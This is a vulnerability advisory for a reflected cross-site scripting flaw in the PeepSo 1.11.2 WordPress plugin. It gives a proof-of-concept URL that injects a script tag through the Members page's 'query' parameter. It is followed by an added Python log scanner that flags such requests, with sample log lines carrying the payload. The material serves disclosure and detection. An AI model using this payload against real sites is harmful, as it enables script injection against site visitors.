WordPress PeepSo 1.11.2 Cross Site Scripting

2018-11-12T00:00:00
ID PACKETSTORM:150267
Type packetstorm
Reporter Socket_0x03
Modified 2018-11-12T00:00:00

Description

                                        
                                            `  
  
===================================================================================  
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members  
===================================================================================  
  
  
____________________________________________________________________________________  
  
  
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members   
  
# Date: [11-09-2018]  
  
# Category: Webapps  
  
____________________________________________________________________________________  
  
  
# Author: Socket_0x03 (Alvaro J. Gene)  
  
# Email: Socket_0x03 (at) teraexe (dot) com  
  
# Website: www.teraexe.com   
  
____________________________________________________________________________________  
  
  
# Software Link: https://wordpress.org/plugins/peepso-core/  
  
# Plugin: PeepSo  
  
# Version: 1.11.2  
  
# File: Members   
  
# Parameter: query  
  
# Language: This application is available in English.  
  
# Plugin Description: PeepSo is a social network plugin for WordPress with different  
kinds of features, such as user profiles, user registration, and other features.   
  
____________________________________________________________________________________  
  
  
# Cross-Site Scripting Vulnerability:   
  
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>  
  
  
`
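Added example (not part of the original advisory and not PeepSo code): a log check that flags requests to the Members page whose `query` parameter decodes to markup characters, as in the URL above. The combined access-log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that close a double-quoted attribute or open a tag, as in the advisory's URL
MARKUP_RE = re.compile(r'[<>"]')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_query(target):
    """Return the decoded `query` value if a Members request carries markup in it."""
    parts = urlsplit(target)
    if "/members" not in parts.path.lower():
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("query", []):
        value = decode_fully(raw)  # parse_qs has already decoded once
        if MARKUP_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        value = suspicious_query(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2018:10:00:01 +0000] "GET /wordpress/index.php/members/?query=alice HTTP/1.1" 200 5123',
    '203.0.113.9 - - [12/Nov/2018:10:00:05 +0000] "GET /wordpress/index.php/members/?blocked/&query=%22%3E%3Cscript%3Ealert(23)%3C/script%3E HTTP/1.1" 200 5240',
    '203.0.113.9 - - [12/Nov/2018:10:00:09 +0000] "GET /wordpress/index.php/members/?query=%2522%253E%253Cb%253E HTTP/1.1" 200 5188',
    '203.0.113.4 - - [12/Nov/2018:10:00:12 +0000] "GET /wordpress/?s=%3Cb%3E HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: query={value!r}")
```

A hit shows only that markup was submitted in `query`; whether it was reflected unescaped depends on the plugin version serving the response.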